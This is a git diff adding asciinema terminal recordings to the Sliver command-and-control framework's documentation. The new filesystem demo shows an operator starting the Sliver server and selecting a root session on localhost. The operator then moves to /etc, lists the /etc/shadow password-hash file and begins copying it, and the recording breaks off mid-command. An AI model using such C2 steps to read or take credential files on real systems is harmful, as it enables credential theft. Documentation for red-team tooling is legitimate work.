"b\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[38.921498, "o", "\u001b[1A\u001b[27D\u001b[26C\u001b[107D\u001b[27C\u001b[?25h"] +[39.000236, "o", "\u001b[?25l\u001b[107D"] +[39.001099, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[39.006038, "o", "ba\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[39.007044, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[28D\u001b[26C\u001b[107D\u001b[28C\u001b[?25h"] +[39.06441, "o", "\u001b[?25l"] +[39.065042, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[39.067577, "o", "bac\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[39.069111, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[29D\u001b[26C\u001b[107D\u001b[29C\u001b[?25h"] +[39.185934, "o", "\u001b[?25l\u001b[107D"] +[39.192091, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[39.199509, "o", "back\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[30D\u001b[26C\u001b[107D\u001b[30C\u001b[?25h"] +[39.357202, "o", "\u001b[?25l\u001b[107D"] +[39.357378, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[39.360949, "o", "backg\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[26C\u001b[107D\u001b[31C\u001b[?25h"] +[39.413344, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[39.414766, "o", "\u001b[6n"] +[39.417393, "o", "backgr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[32D\u001b[26C"] +[39.419039, "o", "\u001b[107D\u001b[32C\u001b[?25h"] +[39.477169, "o", "\u001b[?25l"] +[39.477965, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[39.480338, "o", "backgro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[33D\u001b[26C\u001b[107D\u001b[33C\u001b[?25h"] +[39.54931, "o", "\u001b[?25l\u001b[107D"] +[39.550242, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[39.552782, "o", "backgrou\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[26C\u001b[107D\u001b[34C\u001b[?25h"] +[39.638767, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[39.650342, "o", "\u001b[6n"] +[39.652449, "o", "backgroun\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[26C"] +[39.653044, "o", "\u001b[107D\u001b[35C\u001b[?25h"] +[39.785124, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[39.795851, "o", "\u001b[1m\u001b[32mbackground\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[36D\u001b[26C\u001b[107D\u001b[36C\u001b[?25h"] +[40.033815, "o", "\u001b[36D\u001b[26C"] +[40.040687, "o", "\u001b[6n"] +[40.047095, "o", "\u001b[107D\u001b[36C\u001b[0J\u001b[107D\r\r\n"] +[40.048211, "o", "\u001b[0 q\r\n"] +[40.073042, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mBackground ...\r\n\r\n"] +[40.082883, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[40.083371, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.08517, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[9D\u001b[9C"] +[40.085757, "o", "\u001b[107D\u001b[9C\u001b[?25h"] +[41.082976, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[41.095274, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[41.096137, "o", "\u001b[107D\u001b[1A\u001b[10D\u001b[9C\u001b[107D\u001b[10C\u001b[?25h"] +[41.222323, "o", "\u001b[?25l\u001b[107D"] +[41.223394, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[41.226145, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A"] +[41.226932, "o", "\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[41.347974, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[41.348233, "o", "\u001b[6n"] +[41.352748, "o", "exi\u001b[0m\u001b[0K\u001b[49m\r"] +[41.352926, "o", "\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[12D\u001b[9C\u001b[107D\u001b[12C\u001b[?25h"] +[41.513029, "o", "\u001b[?25l"] +[41.513904, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[41.518602, "o", "\u001b[1m\u001b[32mexit\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[41.521172, "o", "\u001b[107D\u001b[1A\u001b[13D\u001b[9C\u001b[107D\u001b[13C\u001b[?25h"] +[41.725387, "o", "\u001b[13D\u001b[9C"] +[41.727136, "o", "\u001b[6n"] +[41.730055, "o", "\u001b[107D\u001b[13C\u001b[0J\u001b[107D\r\r\n"] +[41.731351, "o", "\u001b[0 q\r\n"] +[41.755961, "o", "Exiting...\r\n"] +[41.782934, "o", "\u001b[?2004h"] +[41.783254, "o", "root@98df0494f659:~# "] +[42.976879, "o", "\u001b[?2004l\r\r\n"] +[42.978376, "o", "exit\r\n"] diff --git a/docs/sliver-docs/public/asciinema/filesystem.cast b/docs/sliver-docs/public/asciinema/filesystem.cast new file mode 100644 index 0000000000..b84393bf2b --- /dev/null +++ b/docs/sliver-docs/public/asciinema/filesystem.cast @@ -0,0 +1,719 @@ +{"version": 2, "width": 133, "height": 91, "timestamp": 1714569350, "env": {"SHELL": "/bin/bash", "TERM": "screen"}} +[0.130371, "o", "\u001b[?2004h"] +[0.138191, "o", "root@98df0494f659:~# "] +[0.822762, "o", "."] +[0.858066, "o", "/"] +[1.075045, "o", "s"] +[1.209517, "o", "l"] +[1.27683, "o", "i"] +[1.403244, "o", "v"] +[1.607254, "o", "e"] +[1.736418, "o", "r"] +[1.923876, "o", "-"] +[2.087303, "o", "s"] +[2.1209, "o", "e"] +[2.218423, "o", "r"] +[2.496957, "o", "v"] +[2.641655, "o", "e"] +[2.752513, "o", "r"] +[2.85634, "o", "\r\n"] +[2.861432, "o", "\u001b[?2004l\r"] +[3.947825, "o", "\u001b[31m\r\r\n \t ██████ ██▓ ██▓ ██▒ █▓▓█████ ██▀███\r\r\n\t▒██ ▒ ▓██▒ ▓██▒▓██░ █▒▓█ ▀ ▓██ ▒ ██▒\r\r\n\t░ ▓██▄ ▒██░ ▒██▒ ▓██ █▒░▒███ ▓██ ░▄█ ▒\r\r\n\t ▒ ██▒▒██░ ░██░ ▒██ █░░▒▓█ ▄ ▒██▀▀█▄\r\r\n\t▒██████▒▒░██████▒░██░ ▒▀█░ ░▒████▒░██▓ ▒██▒\r\r\n\t▒ ▒▓▒ ▒ ░░ ▒░▓ ░░▓ ░ ▐░ ░░ ▒░ ░░ ▒▓ ░▒▓░\r\r\n\t░ ░▒ ░ ░░ ░ ▒ ░ ▒ ░ ░ ░░ ░ ░ ░ ░▒ ░ ▒░\r\r\n\t░ ░ ░ ░ ░ ▒ ░ ░░ ░ ░░ ░\r\r\n\t\t ░ ░ ░ ░ ░ ░ ░ ░\r\r\n\u001b[0m\r\nAll hackers gain dash\r\r\n"] +[3.950273, "o", "\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.39 - 0b235b4d42d4eb75684825f5d5b30da71ec57d26 - \u001b[1mDirty\u001b[0m\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\r\n\r\n"] +[3.976294, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[3.978246, "o", "\u001b[1 q"] +[3.980126, "o", "\u001b[?25l"] +[3.980339, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[3.981302, "o", "\u001b[6n"] +[3.983115, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[3.983794, "o", "\u001b[0K\u001b[0J\u001b[133D"] +[3.984946, "o", "\u001b[1A\u001b[9D\u001b[9C\u001b[133D\u001b[9C\u001b[?25h"] +[5.795125, "o", "\u001b[9D\u001b[9C\u001b[133D\u001b[0J\r\u001b[2K\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mSession 414ff5a2 CURRENT_RESIST - 127.0.0.1:57792 (98df0494f659) - linux/amd64 - Wed, 01 May 2024 13:15:56 UTC\r\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[?25l"] +[5.795881, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.798279, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[5.798391, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[9D\u001b[9C\u001b[133D\u001b[9C\u001b[?25h"] +[7.044203, "o", "\u001b[?25l\u001b[133D"] +[7.044533, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[7.045765, "o", "\u001b[6n"] +[7.048892, "o", "u\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[7.049024, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[10D\u001b[9C\u001b[133D\u001b[10C\u001b[?25h"] +[7.106935, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[7.107677, "o", "\u001b[6n"] +[7.109587, "o", "us\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[11D\u001b[9C\u001b[133D\u001b[11C\u001b[?25h"] +[7.204271, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[7.204493, "o", "\u001b[6n"] +[7.208434, "o", "\u001b[1m\u001b[32muse\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[12D\u001b[9C\u001b[133D\u001b[12C\u001b[?25h"] +[7.799665, "o", "\u001b[12D\u001b[9C"] +[7.800619, "o", "\u001b[6n"] +[7.807947, "o", "\u001b[133D\u001b[12C\u001b[0J\u001b[133D\r"] +[7.808631, "o", "\r\n"] +[7.811014, "o", "\u001b[0 q"] +[7.812007, "o", "\r\n"] +[7.845059, "o", "\u001b7\u001b[?25l"] +[7.845489, "o", "\u001b8"] +[7.84579, "o", "\u001b[0G\u001b[2K"] +[7.860586, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;1;36m> SESSION 414ff5a2 CURRENT_RESIST 127.0.0.1:57792 98df0494f659 root linux/amd64\u001b[0m\r\n"] +[7.861105, "o", "\u001b7"] +[7.864089, "o", "\u001b[1A"] +[7.864266, "o", "\u001b[0G"] +[8.456892, "o", "\u001b8\u001b[?25h"] +[8.466113, "o", "\u001b8\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m\u001b[0;36m SESSION 414ff5a2 CURRENT_RESIST 127.0.0.1:57792 98df0494f659 root linux/amd64\u001b[0m\r\n"] +[8.471343, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mActive session CURRENT_RESIST (414ff5a2-5ca5-478e-9dea-58528f458f1d)\r\n"] +[8.518657, "o", "\r\n"] +[8.530041, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[8.530224, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[8.530453, "o", "\u001b[6n"] +[8.532344, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[8.532865, "o", "\u001b[133D\u001b[1A\u001b[26D\u001b[26C\u001b[133D\u001b[26C\u001b[?25h"] +[9.393469, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[9.410358, "o", "p\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[27D\u001b[26C\u001b[133D\u001b[27C\u001b[?25h"] +[9.659443, "o", "\u001b[?25l"] +[9.660932, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[9.663996, "o", "pw\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[28D\u001b[26C\u001b[133D\u001b[28C\u001b[?25h"] +[9.770023, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[9.771583, "o", "\u001b[6n"] +[9.778511, "o", "\u001b[1m\u001b[32mpwd\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[9.779725, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[29D\u001b[26C\u001b[133D\u001b[29C\u001b[?25h"] +[10.699491, "o", "\u001b[29D\u001b[26C\u001b[6n"] +[10.709062, "o", "\u001b[133D\u001b[29C\u001b[0J\u001b[133D\r\r\n\u001b[0 q\r\n"] +[10.794351, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0m/root"] +[10.795943, "o", "\r\n\r\n"] +[10.804909, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[10.805335, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[10.806558, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[26D\u001b[26C\u001b[133D\u001b[26C\u001b[?25h"] +[12.258373, "o", "\u001b[?25l\u001b[133D"] +[12.259451, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[12.272934, "o", "c\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[12.273707, "o", "\u001b[133D\u001b[1A\u001b[27D\u001b[26C\u001b[133D\u001b[27C\u001b[?25h"] +[12.312368, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[12.313519, "o", "\u001b[6n"] +[12.316635, "o", "\u001b[1m\u001b[32mcd\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[12.318426, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[28D\u001b[26C\u001b[133D\u001b[28C\u001b[?25h"] +[12.408489, "o", "\u001b[?25l\u001b[133D"] +[12.409902, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[12.41272, "o", "\u001b[1m\u001b[32mcd \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[29D\u001b[26C\u001b[133D\u001b[29C\u001b[?25h"] +[12.716526, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[12.725977, "o", "\u001b[6n"] +[12.730108, "o", "\u001b[1m\u001b[32mcd \u001b[39m\u001b[22m/\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[12.731837, "o", "\u001b[1A\u001b[30D\u001b[26C\u001b[133D\u001b[30C\u001b[?25h"] +[12.891931, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[12.902647, "o", "\u001b[1m\u001b[32mcd \u001b[39m\u001b[22m/e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[12.903997, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[31D\u001b[26C\u001b[133D\u001b[31C\u001b[?25h"] +[12.966582, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[12.969041, "o", "\u001b[6n"] +[12.973452, "o", "\u001b[1m\u001b[32mcd \u001b[39m\u001b[22m/et\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[12.974873, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[32D\u001b[26C\u001b[133D\u001b[32C\u001b[?25h"] +[13.23578, "o", "\u001b[?25l"] +[13.236497, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[13.241486, "o", "\u001b[1m\u001b[32mcd \u001b[39m\u001b[22m/etc\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[13.241685, "o", "\u001b[133D\u001b[1A\u001b[33D\u001b[26C\u001b[133D\u001b[33C\u001b[?25h"] +[13.574465, "o", "\u001b[33D\u001b[26C\u001b[6n"] +[13.580176, "o", "\u001b[133D\u001b[33C\u001b[0J\u001b[133D\r\r\n"] +[13.581298, "o", "\u001b[0 q\r\n"] +[13.676827, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0m/etc\r\n\r\n"] +[13.687947, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[13.688408, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[13.689943, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[13.690037, "o", "\u001b[133D\u001b[1A\u001b[26D\u001b[26C\u001b[133D\u001b[26C\u001b[?25h"] +[15.304689, "o", "\u001b[?25l"] +[15.311488, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[15.320488, "o", "l\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[15.321971, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[27D\u001b[26C\u001b[133D\u001b[27C\u001b[?25h"] +[15.446148, "o", "\u001b[?25l"] +[15.459294, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[15.467592, "o", "\u001b[1m\u001b[32mls\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[28D\u001b[26C"] +[15.468675, "o", "\u001b[133D\u001b[28C\u001b[?25h"] +[15.56532, "o", "\u001b[?25l"] +[15.567191, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[15.574897, "o", "\u001b[1m\u001b[32mls \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[29D\u001b[26C\u001b[133D\u001b[29C\u001b[?25h"] +[15.88002, "o", "\u001b[?25l"] +[15.881841, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[15.884781, "o", "\u001b[1m\u001b[32mls \u001b[39m\u001b[22ms\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[15.885324, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[30D\u001b[26C\u001b[133D\u001b[30C\u001b[?25h"] +[16.064252, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[16.069525, "o", "\u001b[1m\u001b[32mls \u001b[39m\u001b[22msh\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[16.070018, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[31D\u001b[26C\u001b[133D\u001b[31C\u001b[?25h"] +[16.289252, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[16.314573, "o", "\u001b[1m\u001b[32mls \u001b[39m\u001b[22msha\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[16.315356, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[32D\u001b[26C\u001b[133D\u001b[32C\u001b[?25h"] +[16.63829, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[16.64489, "o", "\u001b[1m\u001b[32mls \u001b[39m\u001b[22msha*\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[33D"] +[16.648099, "o", "\u001b[26C\u001b[133D\u001b[33C\u001b[?25h"] +[17.210028, "o", "\u001b[33D\u001b[26C\u001b[6n"] +[17.217497, "o", "\u001b[133D\u001b[33C\u001b[0J\u001b[133D\r\r\n\u001b[0 q\r\n"] +[17.353272, "o", "/etc (1 item, 501 B)\r\n"] +[17.354018, "o", "====================\r\n"] +[17.354247, "o", "-rw-r----- root:shadow shadow 501 B Tue Apr 25 14:03:14 +0000 2023\r\n\r\n\r\n"] +[17.364485, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[17.364605, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[17.365227, "o", "\u001b[6n"] +[17.366605, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[17.367172, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[26D\u001b[26C\u001b[133D\u001b[26C\u001b[?25h"] +[18.459982, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[18.480419, "o", "c\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[27D\u001b[26C\u001b[133D\u001b[27C\u001b[?25h"] +[18.740161, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[18.747124, "o", "\u001b[1m\u001b[32mcp\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[18.748174, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[28D\u001b[26C\u001b[133D\u001b[28C\u001b[?25h"] +[18.874461, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[18.875302, "o", "\u001b[6n"] +[18.880626, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[29D\u001b[26C"] +[18.881555, "o", "\u001b[133D\u001b[29C\u001b[?25h"] +[19.186055, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[19.200231, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22ms\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[30D\u001b[26C\u001b[133D\u001b[30C\u001b[?25h"] +[19.270446, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[19.271413, "o", "\u001b[6n"] +[19.276628, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22msh\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[19.279294, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[31D\u001b[26C\u001b[133D\u001b[31C\u001b[?25h"] +[19.44179, "o", "\u001b[?25l"] +[19.444418, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[19.44687, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22msha\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[32D\u001b[26C\u001b[133D\u001b[32C\u001b[?25h"] +[19.580204, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[19.584317, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshad\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[33D\u001b[26C\u001b[133D\u001b[33C\u001b[?25h"] +[20.020691, "o", "\u001b[?25l"] +[20.024923, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[20.031, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshado\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[34D\u001b[26C\u001b[133D\u001b[34C\u001b[?25h"] +[20.181092, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[20.193655, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[20.194162, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[35D\u001b[26C\u001b[133D\u001b[35C\u001b[?25h"] +[20.499093, "o", "\u001b[?25l\u001b[133D"] +[20.503395, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[20.516425, "o", "\u001b[1m\u001b[32mcp \u001b[39m\u001b[22mshadow \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[36D\u001b[26C"] +[20.518687, "o", "\u001b[133D\u001b[36C\u001b[?25h"] +[20.833119, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[20.841665, "o", 